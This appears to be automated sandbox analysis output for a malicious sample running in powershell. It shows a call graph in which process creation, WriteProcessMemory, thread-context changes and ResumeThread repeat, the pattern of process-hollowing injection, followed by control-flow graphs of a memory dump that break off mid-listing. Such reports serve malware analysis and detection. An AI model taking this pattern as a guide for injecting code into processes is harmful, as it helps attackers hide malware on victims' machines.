259868 WriteProcessMemory 18065->18068 18066 10169c5 18066->17914 18067->18066 18068->18066 18070 10157b2 18069->18070 18072 259870 WriteProcessMemory 18070->18072 18073 259868 WriteProcessMemory 18070->18073 18071 10169c5 18071->17914 18072->18071 18073->18071 18075 10157b2 18074->18075 18075->18074 18077 259870 WriteProcessMemory 18075->18077 18078 259868 WriteProcessMemory 18075->18078 18076 10169c5 18076->17914 18077->18076 18078->18076 18080 1016353 18079->18080 18082 1017260 2 API calls 18080->18082 18083 1017270 2 API calls 18080->18083 18081 1016365 18082->18081 18083->18081 18085 10172b0 18084->18085 18094 259521 18085->18094 18098 259528 18085->18098 18086 10172e0 18086->17954 18090 10172cd 18089->18090 18092 259521 ResumeThread 18090->18092 18093 259528 ResumeThread 18090->18093 18091 10172e0 18091->17954 18092->18091 18093->18091 18095 25956c ResumeThread 18094->18095 18097 2595be 18095->18097 18097->18086 18099 25956c ResumeThread 18098->18099 18101 2595be 18099->18101 18101->18086 18103 101500f CreateProcessA 18102->18103 18105 1015275 18103->18105 18105->18105 18107 101500f CreateProcessA 18106->18107 18109 1015275 18107->18109 18109->18109 18111 1017285 18110->18111 18120 259610 18111->18120 18124 259618 18111->18124 18112 101729b 18112->18033 18116 1017285 18115->18116 18118 259610 Wow64SetThreadContext 18116->18118 18119 259618 Wow64SetThreadContext 18116->18119 18117 101729b 18117->18033 18118->18117 18119->18117 18121 259618 Wow64SetThreadContext 18120->18121 18123 2596df 18121->18123 18123->18112 18125 259661 Wow64SetThreadContext 18124->18125 18127 2596df 18125->18127 18127->18112 18823 256250 18826 256277 18823->18826 18824 2562c1 18826->18824 18827 258dc0 18826->18827 18828 258de5 18827->18828 18831 25a1c9 18828->18831 18832 25a0fd 18831->18832 18832->18831 18833 258df7 18832->18833 18861 25b2a4 18832->18861 18867 25b1df 18832->18867 18872 25af5f 18832->18872 18877 25addd 18832->18877 18882 25b193 18832->18882 18887 25ae56 18832->18887 18895 25aa16 18832->18895 18900 25b115 18832->18900 18905 25b48b 18832->18905 18910 25b00e 18832->18910 18915 25ad8c 18832->18915 18920 25a84d 18832->18920 18925 25afcd 18832->18925 18930 25aa82 18832->18930 18938 25aac3 18832->18938 18943 25af01 18832->18943 18948 25a43c 18832->18948 18953 25b23c 18832->18953 18958 25b07c 18832->18958 18963 25aa32 18832->18963 18971 25ab71 18832->18971 18976 25a8f7 18832->18976 18981 25b334 18832->18981 18989 25b0b5 18832->18989 18993 25b66e 18832->18993 19000 25b5ac 18832->19000 19005 25a7a2 18832->19005 18833->18826 18862 25b2ab 18861->18862 18863 25a432 18861->18863 18865 259870 WriteProcessMemory 18863->18865 18866 259868 WriteProcessMemory 18863->18866 18864 25b645 18864->18832 18865->18864 18866->18864 18868 25a432 18867->18868 18870 259870 WriteProcessMemory 18868->18870 18871 259868 WriteProcessMemory 18868->18871 18869 25b645 18869->18832 18870->18869 18871->18869 18874 25af63 18872->18874 18873 25afe5 19009 25bef0 18874->19009 19014 25bedf 18874->19014 18878 25a432 18877->18878 18880 259870 WriteProcessMemory 18878->18880 18881 259868 WriteProcessMemory 18878->18881 18879 25b645 18879->18832 18880->18879 18881->18879 18883 25a432 18882->18883 18885 259870 WriteProcessMemory 18883->18885 18886 259868 WriteProcessMemory 18883->18886 18884 25b645 18884->18832 18885->18884 18886->18884 18888 25ae60 18887->18888 19019 25bf28 18888->19019 19024 25bf38 18888->19024 18889 25a432 18891 259870 WriteProcessMemory 18889->18891 18892 259868 WriteProcessMemory 18889->18892 18890 25b645 18890->18832 18891->18890 18892->18890 18896 25a432 18895->18896 18898 259870 WriteProcessMemory 18896->18898 18899 259868 WriteProcessMemory 18896->18899 18897 25b645 18897->18832 18898->18897 18899->18897 18901 25a432 18900->18901 18903 259870 WriteProcessMemory 18901->18903 18904 259868 WriteProcessMemory 18901->18904 18902 25b645 18902->18832 18903->18902 18904->18902 18906 25a432 18905->18906 18908 259870 WriteProcessMemory 18906->18908 18909 259868 WriteProcessMemory 18906->18909 18907 25b645 18907->18832 18908->18907 18909->18907 18911 25a432 18910->18911 18911->18910 18913 259870 WriteProcessMemory 18911->18913 18914 259868 WriteProcessMemory 18911->18914 18912 25b645 18912->18832 18913->18912 18914->18912 18916 25a432 18915->18916 18918 259870 WriteProcessMemory 18916->18918 18919 259868 WriteProcessMemory 18916->18919 18917 25b645 18917->18832 18918->18917 18919->18917 18921 25a432 18920->18921 18921->18920 18923 259870 WriteProcessMemory 18921->18923 18924 259868 WriteProcessMemory 18921->18924 18922 25b645 18922->18832 18923->18922 18924->18922 18926 25afd3 18925->18926 18928 25bef0 2 API calls 18926->18928 18929 25bedf 2 API calls 18926->18929 18927 25afe5 18928->18927 18929->18927 18931 25aa58 18930->18931 18932 25a432 18931->18932 18934 25bf28 2 API calls 18931->18934 18935 25bf38 2 API calls 18931->18935 18936 259870 WriteProcessMemory 18932->18936 18937 259868 WriteProcessMemory 18932->18937 18933 25b645 18933->18832 18934->18932 18935->18932 18936->18933 18937->18933 18939 25a432 18938->18939 18941 259870 WriteProcessMemory 18939->18941 18942 259868 WriteProcessMemory 18939->18942 18940 25b645 18940->18832 18941->18940 18942->18940 18944 25a432 18943->18944 18946 259870 WriteProcessMemory 18944->18946 18947 259868 WriteProcessMemory 18944->18947 18945 25b645 18945->18832 18946->18945 18947->18945 18949 25a432 18948->18949 18951 259870 WriteProcessMemory 18949->18951 18952 259868 WriteProcessMemory 18949->18952 18950 25b645 18950->18832 18951->18950 18952->18950 18954 25a432 18953->18954 18956 259870 WriteProcessMemory 18954->18956 18957 259868 WriteProcessMemory 18954->18957 18955 25b645 18955->18832 18956->18955 18957->18955 18959 25a432 18958->18959 18961 259870 WriteProcessMemory 18959->18961 18962 259868 WriteProcessMemory 18959->18962 18960 25b645 18960->18832 18961->18960 18962->18960 18964 25aa3c 18963->18964 18969 25bf28 2 API calls 18964->18969 18970 25bf38 2 API calls 18964->18970 18965 25a432 18967 259870 WriteProcessMemory 18965->18967 18968 259868 WriteProcessMemory 18965->18968 18966 25b645 18966->18832 18967->18966 18968->18966 18969->18965 18970->18965 18972 25a432 18971->18972 18974 259870 WriteProcessMemory 18972->18974 18975 259868 WriteProcessMemory 18972->18975 18973 25b645 18973->18832 18974->18973 18975->18973 18977 25b61e 18976->18977 18979 259870 WriteProcessMemory 18977->18979 18980 259868 WriteProcessMemory 18977->18980 18978 25b645 18978->18832 18979->18978 18980->18978 18982 25ae7c 18981->18982 18983 25a432 18981->18983 18987 25bf28 2 API calls 18982->18987 18988 25bf38 2 API calls 18982->18988 18985 259870 WriteProcessMemory 18983->18985 18986 259868 WriteProcessMemory 18983->18986 18984 25b645 18984->18832 18985->18984 18986->18984 18987->18983 18988->18983 18991 259870 WriteProcessMemory 18989->18991 18992 259868 WriteProcessMemory 18989->18992 18990 25b0df 18991->18990 18992->18990 19029 259c04 18993->19029 19033 259c08 18993->19033 18994 25a432 18998 259870 WriteProcessMemory 18994->18998 18999 259868 WriteProcessMemory 18994->18999 18995 25b645 18995->18832 18998->18995 18999->18995 19001 25a432 19000->19001 19003 259870 WriteProcessMemory 19001->19003 19004 259868 WriteProcessMemory 19001->19004 19002 25b645 19002->18832 19003->19002 19004->19002 19007 259870 WriteProcessMemory 19005->19007 19008 259868 WriteProcessMemory 19005->19008 19006 25a7d6 19007->19006 19008->19006 19010 25bf05 19009->19010 19012 259610 Wow64SetThreadContext 19010->19012 19013 259618 Wow64SetThreadContext 19010->19013 19011 25bf1b 19011->18873 19012->19011 19013->19011 19015 25bf05 19014->19015 19017 259610 Wow64SetThreadContext 19015->19017 19018 259618 Wow64SetThreadContext 19015->19018 19016 25bf1b 19016->18873 19017->19016 19018->19016 19020 25bf4d 19019->19020 19022 259521 ResumeThread 19020->19022 19023 259528 ResumeThread 19020->19023 19021 25bf60 19021->18889 19022->19021 19023->19021 19025 25bf4d 19024->19025 19027 259521 ResumeThread 19025->19027 19028 259528 ResumeThread 19025->19028 19026 25bf60 19026->18889 19027->19026 19028->19026 19030 259c08 CreateProcessA 19029->19030 19032 259ef5 19030->19032 19034 259c8f CreateProcessA 19033->19034 19036 259ef5 19034->19036 18138 1021054 18139 1020b9c 18138->18139 18140 1020152 18138->18140 18146 10220d0 18139->18146 18151 10220c1 18139->18151 18142 259870 WriteProcessMemory 18140->18142 18143 259868 WriteProcessMemory 18140->18143 18141 1021365 18142->18141 18143->18141 18147 10220e5 18146->18147 18149 259521 ResumeThread 18147->18149 18150 259528 ResumeThread 18147->18150 18148 10220f8 18148->18140 18149->18148 18150->18148 18152 10220d0 18151->18152 18154 259521 ResumeThread 18152->18154 18155 259528 ResumeThread 18152->18155 18153 10220f8 18153->18140 18154->18153 18155->18153 18156 1020dd5 18158 259870 WriteProcessMemory 18156->18158 18159 259868 WriteProcessMemory 18156->18159 18157 1020dff 18158->18157 18159->18157 18603 1027529 18606 102762a 18603->18606 18608 10275e6 18606->18608 18607 102752e 18608->18607 18610 1029cf7 18608->18610 18611 1029d1d 18610->18611 18614 102ab41 18611->18614 18615 102aa75 18614->18615 18615->18614 18616 1029d2f 18615->18616 18643 102b38e 18615->18643 18648 102b7ce 18615->18648 18656 102bb0b 18615->18656 18661 102b1c5 18615->18661 18666 102b945 18615->18666 18671 102b704 18615->18671 18676 102b986 18615->18676 18681 102be03 18615->18681 18686 102b879 18615->18686 18691 102b43b 18615->18691 18696 102b3fa 18615->18696 18704 102adb4 18615->18704 18709 102bbb4 18615->18709 18714 102b9f4 18615->18714 18719 102ba2d 18615->18719 18723 102bcac 18615->18723 18731 102b26f 18615->18731 18736 102b4e9 18615->18736 18741 102b3aa 18615->18741 18749 102bf24 18615->18749 18754 102bfe6 18615->18754 18760 102b11a 18615->18760 18764 102b755 18615->18764 18769 102bb57 18615->18769 18774 102b8d7 18615->18774 18779 102ba8d 18615->18779 18616->18608 18644 102adaa 18643->18644 18646 259870 WriteProcessMemory 18644->18646 18647 259868 WriteProcessMemory 18644->18647 18645 102bfbd 18645->18615 18646->18645 18647->18645 18649 102b7d8 18648->18649 18784 102c8a0 18649->18784 18789 102c8b0 18649->18789 18650 102adaa 18652 259870 WriteProcessMemory 18650->18652 18653 259868 WriteProcessMemory 18650->18653 18651 102bfbd 18651->18615 18652->18651 18653->18651 18657 102adaa 18656->18657 18659 259870 WriteProcessMemory 18657->18659 18660 259868 WriteProcessMemory 18657->18660 18658 102bfbd 18658->18615 18659->18658 18660->18658 18662 102adaa 18661->18662 18662->18661 18664 259870 WriteProcessMemory 18662->18664 18665 259868 WriteProcessMemory 18662->18665 18663 102bfbd 18663->18615 18664->18663 18665->18663 18667 102b94b 18666->18667 18794 102c868 18667->18794 18799 102c859 18667->18799 18668 102b95d 18672 102adaa 18671->18672 18674 259870 WriteProcessMemory 18672->18674 18675 259868 WriteProcessMemory 18672->18675 18673 102bfbd 18673->18615 18674->18673 18675->18673 18677 102adaa 18676->18677 18679 259870 WriteProcessMemory 18677->18679 18680 259868 WriteProcessMemory 18677->18680 18678 102bfbd 18678->18615 18679->18678 18680->18678 18682 102adaa 18681->18682 18684 259870 WriteProcessMemory 18682->18684 18685 259868 WriteProcessMemory 18682->18685 18683 102bfbd 18683->18615 18684->18683 18685->18683 18687 102adaa 18686->18687 18689 259870 WriteProcessMemory 18687->18689 18690 259868 WriteProcessMemory 18687->18690 18688 102bfbd 18688->18615 18689->18688 18690->18688 18692 102adaa 18691->18692 18694 259870 WriteProcessMemory 18692->18694 18695 259868 WriteProcessMemory 18692->18695 18693 102bfbd 18693->18615 18694->18693 18695->18693 18697 102b3d0 18696->18697 18698 102adaa 18697->18698 18700 102c8a0 2 API calls 18697->18700 18701 102c8b0 2 API calls 18697->18701 18702 259870 WriteProcessMemory 18698->18702 18703 259868 WriteProcessMemory 18698->18703 18699 102bfbd 18699->18615 18700->18698 18701->18698 18702->18699 18703->18699 18705 102adaa 18704->18705 18707 259870 WriteProcessMemory 18705->18707 18708 259868 WriteProcessMemory 18705->18708 18706 102bfbd 18706->18615 18707->18706 18708->18706 18710 102adaa 18709->18710 18712 259870 WriteProcessMemory 18710->18712 18713 259868 WriteProcessMemory 18710->18713 18711 102bfbd 18711->18615 18712->18711 18713->18711 18715 102adaa 18714->18715 18717 259870 WriteProcessMemory 18715->18717 18718 259868 WriteProcessMemory 18715->18718 18716 102bfbd 18716->18615 18717->18716 18718->18716 18721 259870 WriteProcessMemory 18719->18721 18722 259868 WriteProcessMemory 18719->18722 18720 102ba57 18721->18720 18722->18720 18724 102b7f4 18723->18724 18725 102adaa 18723->18725 18729 102c8a0 2 API calls 18724->18729 18730 102c8b0 2 API calls 18724->18730 18727 259870 WriteProcessMemory 18725->18727 18728 259868 WriteProcessMemory 18725->18728 18726 102bfbd 18726->18615 18727->18726 18728->18726 18729->18725 18730->18725 18732 102bf96 18731->18732 18734 259870 WriteProcessMemory 18732->18734 18735 259868 WriteProcessMemory 18732->18735 18733 102bfbd 18733->18615 18734->18733 18735->18733 18737 102adaa 18736->18737 18739 259870 WriteProcessMemory 18737->18739 18740 259868 WriteProcessMemory 18737->18740 18738 102bfbd 18738->18615 18739->18738 18740->18738 18742 102b3b4 18741->18742 18747 102c8a0 2 API calls 18742->18747 18748 102c8b0 2 API calls 18742->18748 18743 102adaa 18745 259870 WriteProcessMemory 18743->18745 18746 259868 WriteProcessMemory 18743->18746 18744 102bfbd 18744->18615 18745->18744 18746->18744 18747->18743 18748->18743 18750 102adaa 18749->18750 18752 259870 WriteProcessMemory 18750->18752 18753 259868 WriteProcessMemory 18750->18753 18751 102bfbd 18751->18615 18752->18751 18753->18751 18804 102a580 18754->18804 18756 102bfbd 18756->18615 18758 259870 WriteProcessMemory 18758->18756 18759 259868 WriteProcessMemory 18759->18756 18762 259870 WriteProcessMemory 18760->18762 18763 259868 WriteProcessMemory 18760->18763 18761 102b14e 18762->18761 18763->18761 18765 102adaa 18764->18765 18767 259870 WriteProcessMemory 18765->18767 18768 259868 WriteProcessMemory 18765->18768 18766 102bfbd 18766->18615 18767->18766 18768->18766 18770 102adaa 18769->18770 18772 259870 WriteProcessMemory 18770->18772 18773 259868 WriteProcessMemory 18770->18773 18771 102bfbd 18771->18615 18772->18771 18773->18771 18775 102b8db 18774->18775 18777 102c868 2 API calls 18775->18777 18778 102c859 2 API calls 18775->18778 18776 102b95d 18777->18776 18778->18776 18780 102adaa 18779->18780 18782 259870 WriteProcessMemory 18780->18782 18783 259868 WriteProcessMemory 18780->18783 18781 102bfbd 18781->18615 18782->18781 18783->18781 18785 102c8c5 18784->18785 18787 259521 ResumeThread 18785->18787 18788 259528 ResumeThread 18785->18788 18786 102c8d8 18786->18650 18787->18786 18788->18786 18790 102c8c5 18789->18790 18792 259521 ResumeThread 18790->18792 18793 259528 ResumeThread 18790->18793 18791 102c8d8 18791->18650 18792->18791 18793->18791 18795 102c87d 18794->18795 18797 259610 Wow64SetThreadContext 18795->18797 18798 259618 Wow64SetThreadContext 18795->18798 18796 102c893 18796->18668 18797->18796 18798->18796 18800 102c87d 18799->18800 18802 259610 Wow64SetThreadContext 18800->18802 18803 259618 Wow64SetThreadContext 18800->18803 18801 102c893 18801->18668 18802->18801 18803->18801 18805 102a607 CreateProcessA 18804->18805 18807 102a86d 18805->18807 18807->18758 18807->18759 18128 102138e 18134 25f800 18128->18134 18129 1020152 18131 259870 WriteProcessMemory 18129->18131 18132 259868 WriteProcessMemory 18129->18132 18130 1021365 18131->18130 18132->18130 18135 25f887 CreateProcessA 18134->18135 18137 25faed 18135->18137 18808 1020ced 18809 1020cf3 18808->18809 18813 1022077 18809->18813 18818 1022088 18809->18818 18810 1020d05 18814 1022088 18813->18814 18816 259610 Wow64SetThreadContext 18814->18816 18817 259618 Wow64SetThreadContext 18814->18817 18815 10220b3 18815->18810 18816->18815 18817->18815 18819 102209d 18818->18819 18821 259610 Wow64SetThreadContext 18819->18821 18822 259618 Wow64SetThreadContext 18819->18822 18820 10220b3 18820->18810 18821->18820 18822->18820

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 380f60-380f6f 1 380f8f 0->1 2 380f71-380f8d 0->2 3 380f91-380f93 1->3 2->3 5 380f99-380fa0 3->5 6 381040-38104a 3->6 9 381098-3810e3 5->9 10 380fa6-380fab 5->10 7 38104c-381053 6->7 8 381056-38105c 6->8 12 38105e-381060 8->12 13 381062-38106e 8->13 26 3810e9-3810ee 9->26 27 38123a-381286 9->27 14 380fad-380fb3 10->14 15 380fc3-380fd9 10->15 17 381070-38108b 12->17 13->17 18 380fb5 14->18 19 380fb7-380fc1 14->19 15->9 23 380fdf-380fff 15->23 18->15 19->15 37 38108e-381093 23->37 38 381005-38100c 23->38 28 3810f0-3810f6 26->28 29 381106-38110a 26->29 39 38128c-381291 27->39 40 3813f3-381425 27->40 33 3810f8 28->33 34 3810fa-381104 28->34 35 381110-381112 29->35 36 3811e7-3811f1 29->36 33->29 34->29 43 381122 35->43 44 381114-381120 35->44 41 3811ff-381205 36->41 42 3811f3-3811fc 36->42 37->38 45 38100e-381014 38->45 46 381026-38103a 38->46 48 3812a9-3812ad 39->48 49 381293-381299 39->49 65 381435 40->65 66 381427-381433 40->66 50 38120b-381217 41->50 51 381207-381209 41->51 47 381124-381126 43->47 44->47 54 381018-381024 45->54 55 381016 45->55 46->6 47->36 62 38112c-381130 47->62 60 3813a2-3813ac 48->60 61 3812b3-3812b5 48->61 57 38129b 49->57 58 38129d-3812a7 49->58 59 381219-381237 50->59 51->59 54->46 55->46 57->48 58->48 67 3813ba-3813c0 60->67 68 3813ae-3813b7 60->68 70 3812c5 61->70 71 3812b7-3812c3 61->71 63 381150 62->63 64 381132-38114e 62->64 77 381152-381154 63->77 64->77 73 381437-381439 65->73 66->73 74 3813c2-3813c4 67->74 75 3813c6-3813d2 67->75 78 3812c7-3812c9 70->78 71->78 81 38143b-381441 73->81 82 381485-38148f 73->82 84 3813d4-3813f0 74->84 75->84 77->36 83 38115a-38115d 77->83 78->60 85 3812cf-3812d1 78->85 89 38144f-38146c 81->89 90 381443-381445 81->90 92 38149a-3814a0 82->92 93 381491-381497 82->93 98 381167-38116d 83->98 86 3812e1 85->86 87 3812d3-3812df 85->87 94 3812e3-3812e5 86->94 87->94 108 38146e-38147f 89->108 109 3814d2-3814d7 89->109 90->89 95 3814a2-3814a4 92->95 96 3814a6-3814b2 92->96 94->60 100 3812eb-3812ed 94->100 101 3814b4-3814cf 95->101 96->101 107 381173-381175 98->107 104 3812ef-3812f5 100->104 105 381307-38130b 100->105 110 3812f9-381305 104->110 111 3812f7 104->111 113 38130d-381313 105->113 114 381325-38139f 105->114 115 38118d-3811e4 107->115 116 381177-38117d 107->116 108->82 109->108 110->105 111->105 117 381315 113->117 118 381317-381323 113->118 119 38117f 116->119 120 381181-381183 116->120 117->114 118->114 119->115 120->115
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0U%$4'p$4'p$8#f$8#f$tPp$tPp$$p$$p$$p$$p$$p$$p$[f$[f
                    • API String ID: 0-3989460130
                    • Opcode ID: 916220451d5d5226ccf432fb046dd0f6d92433d3ab039c4d919bbac625e54b06
                    • Instruction ID: 7d063a488fc2d7212e3e7bef38b3aebae8d5deb7f21b68c5027949922d78875a
                    • Opcode Fuzzy Hash: 916220451d5d5226ccf432fb046dd0f6d92433d3ab039c4d919bbac625e54b06
                    • Instruction Fuzzy Hash: 3BE14831B043409FCB26AA69DC54B6ABBEAEFC5311F3980AAD545CB281DB71DC42C791

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 129 3852a8-3852cd 130 3852d3-3852d8 129->130 131 385427-385472 129->131 132 3852da-3852e0 130->132 133 3852f0-3852f4 130->133 143 385478-38547d 131->143 144 385589-3855ad 131->144 137 3852e2 132->137 138 3852e4-3852ee 132->138 134 3852fa-3852fc 133->134 135 3853d7-3853e1 133->135 141 3852fe-38530f 134->141 142 38533f 134->142 139 3853ef-3853f5 135->139 140 3853e3-3853ec 135->140 137->133 138->133 146 3853fb-385407 139->146 147 3853f7-3853f9 139->147 141->131 166 385315-38531d 141->166 145 385341-385343 142->145 149 38547f-385485 143->149 150 385495-385499 143->150 159 3855d8 144->159 160 3855af-3855bd 144->160 145->135 154 385349-38536d 145->154 155 385409-385424 146->155 147->155 151 385489-385493 149->151 152 385487 149->152 156 38553b-385545 150->156 157 38549f-3854a1 150->157 151->150 152->150 196 38536f-385375 154->196 197 385387-38538e 154->197 161 385552-385558 156->161 162 385547-38554f 156->162 164 3854b1 157->164 165 3854a3-3854af 157->165 173 3855d9 159->173 174 38564e-385667 159->174 167 3855cd 160->167 168 3855bf-3855cb 160->168 171 38555a-38555c 161->171 172 38555e-38556a 161->172 175 3854b3-3854b5 164->175 165->175 177 38531f-385325 166->177 178 385335-38533d 166->178 179 3855cf-3855d1 167->179 168->179 180 38556c-385586 171->180 172->180 181 3855da-3855dd 173->181 182 3855e7-385604 173->182 175->156 183 3854bb-3854c1 175->183 184 385329-385333 177->184 185 385327 177->185 178->145 186 38561d-385627 179->186 187 3855d3 179->187 181->182 206 38566a-38566f 182->206 207 385606-385617 182->207 191 3854cf-385538 183->191 192 3854c3-3854c5 183->192 184->178 185->178 194 385629-38562f 186->194 195 385632-385638 186->195 187->159 192->191 201 38563a-38563c 195->201 202 38563e-38564a 195->202 203 385379-385385 196->203 204 385377 196->204 210 385394-3853d4 197->210 209 38564c 201->209 202->209 203->197 204->197 206->207 207->186 209->174
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8#f$8#f$<)$`)$h%f$h%f$h%f$h%f
                    • API String ID: 0-1171752276
                    • Opcode ID: e6e070e8a7d7900162bcb97f3e06028a590903dac41b2e9219ee1c2d2afcac3f
                    • Instruction ID: dd39bd7d499e322019800ba4a33a99bb5eb104be210dd4b295f0e580f722cf40
                    • Opcode Fuzzy Hash: e6e070e8a7d7900162bcb97f3e06028a590903dac41b2e9219ee1c2d2afcac3f
                    • Instruction Fuzzy Hash: 0DA13935B047408FCB16AB69D81076ABFF2AFC6311F6980FAD446DB291DA71CC45C7A1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 218 382fc0-382fd2 219 382fd8-382fe9 218->219 220 383092-3830da 218->220 223 382feb-382ff1 219->223 224 383003-383020 219->224 225 3830e0-3830e5 220->225 226 383206-383215 220->226 227 382ff3 223->227 228 382ff5-383001 223->228 224->220 240 383022-383044 224->240 229 3830fd-383101 225->229 230 3830e7-3830ed 225->230 241 38322d-383236 226->241 242 383217-38321d 226->242 227->224 228->224 231 3831b8-3831c2 229->231 232 383107-383109 229->232 235 3830ef 230->235 236 3830f1-3830fb 230->236 243 3831cf-3831d5 231->243 244 3831c4-3831cc 231->244 237 383119 232->237 238 38310b-383117 232->238 235->229 236->229 247 38311b-38311d 237->247 238->247 257 38305e-383076 240->257 258 383046-38304c 240->258 253 38323b-383244 241->253 249 38321f 242->249 250 383221-38322b 242->250 245 3831db-3831e7 243->245 246 3831d7-3831d9 243->246 251 3831e9-383203 245->251 246->251 247->231 252 383123-38313b 247->252 249->241 250->241 265 38313d-383143 252->265 266 383155-38315c 252->266 260 383249-383250 253->260 267 383078-38307a 257->267 268 383084-38308f 257->268 262 38304e 258->262 263 383050-38305c 258->263 262->257 263->257 269 383145 265->269 270 383147-383153 265->270 272 38315e-383164 266->272 273 383174-3831b5 266->273 267->268 269->266 270->266 275 383168-383172 272->275 276 383166 272->276 275->273 276->273
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$89)$h%f$h%f$tPp$tPp
                    • API String ID: 0-2910678654
                    • Opcode ID: 303c8afd4d7dda89193e7c57c5aca7978fb8baf5a3e5a162234c3f44e526b683
                    • Instruction ID: 129bb39c4ffc4a05aaacc44dbf0b1b320cd390cdddef545c3389c49b14651ee6
                    • Opcode Fuzzy Hash: 303c8afd4d7dda89193e7c57c5aca7978fb8baf5a3e5a162234c3f44e526b683
                    • Instruction Fuzzy Hash: 13711671B003058FCB15AB68C8156AAFBB5EFC5B10F29C0EAD9459B341DB72DE01C792

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 280 381f98-381fba 281 38213d-382182 280->281 282 381fc0-381fc5 280->282 290 382188-38218d 281->290 291 382304-38231c 281->291 283 381fdd-381fe1 282->283 284 381fc7-381fcd 282->284 288 3820e8-3820f2 283->288 289 381fe7-381feb 283->289 285 381fcf 284->285 286 381fd1-381fdb 284->286 285->283 286->283 292 382100-382106 288->292 293 3820f4-3820fd 288->293 294 38202b 289->294 295 381fed-381ffe 289->295 296 38218f-382195 290->296 297 3821a5-3821a9 290->297 314 38231e-38234a 291->314 315 3822b5-3822b9 291->315 298 382108-38210a 292->298 299 38210c-382118 292->299 300 38202d-38202f 294->300 295->281 310 382004-382009 295->310 302 382199-3821a3 296->302 303 382197 296->303 306 3822af-3822b3 297->306 307 3821af-3821b3 297->307 304 38211a-38213a 298->304 299->304 300->288 309 382035-382039 300->309 302->297 303->297 306->315 312 3821f3 307->312 313 3821b5-3821c6 307->313 309->288 316 38203f-382043 309->316 318 38200b-382011 310->318 319 382021-382029 310->319 321 3821f5-3821f7 312->321 313->291 345 3821cc-3821d1 313->345 322 382350-382355 314->322 323 3824f4-382553 314->323 326 3822bb-3822c4 315->326 327 3822c7-3822cd 315->327 324 382045-38204e 316->324 325 382066 316->325 330 382013 318->330 331 382015-38201f 318->331 319->300 321->306 334 3821fd-382201 321->334 335 38236d-382371 322->335 336 382357-38235d 322->336 337 382050-382053 324->337 338 382055-382062 324->338 332 382069-382076 325->332 328 3822cf-3822d1 327->328 329 3822d3-3822df 327->329 339 3822e1-382301 328->339 329->339 330->319 331->319 364 382078-38207e 332->364 365 38208e-3820e5 332->365 334->306 347 382207-38220b 334->347 343 38249c-3824a6 335->343 344 382377-38237b 335->344 341 38235f 336->341 342 382361-38236b 336->342 348 382064 337->348 338->348 341->335 342->335 353 3824a8-3824b1 343->353 354 3824b4-3824ba 343->354 355 3823bb 344->355 356 38237d-38238e 344->356 358 3821e9-3821f1 345->358 359 3821d3-3821d9 345->359 360 38220d-382216 347->360 361 38222e 347->361 348->332 368 3824bc-3824be 354->368 369 3824c0-3824cc 354->369 362 3823bd-3823bf 355->362 356->323 387 382394-382399 356->387 358->321 370 3821db 359->370 371 3821dd-3821e7 359->371 372 382218-38221b 360->372 373 38221d-38222a 360->373 367 382231-38223d 361->367 362->343 375 3823c5-3823c9 362->375 376 382080 364->376 377 382082-382084 364->377 390 38223f-382245 367->390 391 382255-3822ac 367->391 380 3824ce-3824f1 368->380 369->380 370->358 371->358 374 38222c 372->374 373->374 374->367 375->343 382 3823cf-3823d3 375->382 376->365 377->365 382->343 389 3823d9-3823ff 382->389 392 38239b-3823a1 387->392 393 3823b1-3823b9 387->393 389->343 406 382405-382409 389->406 396 382249-38224b 390->396 397 382247 390->397 399 3823a3 392->399 400 3823a5-3823af 392->400 393->362 396->391 397->391 399->393 400->393 407 38240b-382414 406->407 408 38242c 406->408 409 38241b-382428 407->409 410 382416-382419 407->410 411 38242f-38243c 408->411 412 38242a 409->412 410->412 414 382442-382499 411->414 412->411
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (op$(op$4'p$4'p$4'p$4'p
                    • API String ID: 0-37081557
                    • Opcode ID: 91ee206dc187a0233e8c8aa3af071c19bc8dc57372899feed4bb8a6c9bc05359
                    • Instruction ID: 2906e2f46d3691754ed6879813904bd3e7c056e43ed8f82175844fc47174313b
                    • Opcode Fuzzy Hash: 91ee206dc187a0233e8c8aa3af071c19bc8dc57372899feed4bb8a6c9bc05359
                    • Instruction Fuzzy Hash: FAE1E230B04304DFCB16AF69D854BABBBB2EF85310F25C4AAD9158B291DB75CD41CBA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 416 380ad0-380af3 417 380af9-380afe 416->417 418 380cce-380cfa 416->418 419 380b00-380b06 417->419 420 380b16-380b1a 417->420 426 380cfc-380d01 418->426 427 380d47-380d81 418->427 421 380b08 419->421 422 380b0a-380b14 419->422 423 380c7b-380c85 420->423 424 380b20-380b24 420->424 421->420 422->420 428 380c93-380c99 423->428 429 380c87-380c90 423->429 430 380b26-380b35 424->430 431 380b37 424->431 432 380d19-380d31 426->432 433 380d03-380d09 426->433 445 380da0 427->445 446 380d83-380d9e 427->446 434 380c9b-380c9d 428->434 435 380c9f-380cab 428->435 437 380b39-380b3b 430->437 431->437 449 380d3f-380d44 432->449 450 380d33-380d35 432->450 438 380d0b 433->438 439 380d0d-380d17 433->439 440 380cad-380ccb 434->440 435->440 437->423 441 380b41-380b61 437->441 438->432 439->432 464 380b80 441->464 465 380b63-380b7e 441->465 448 380da2-380da4 445->448 446->448 454 380daa-380dae 448->454 455 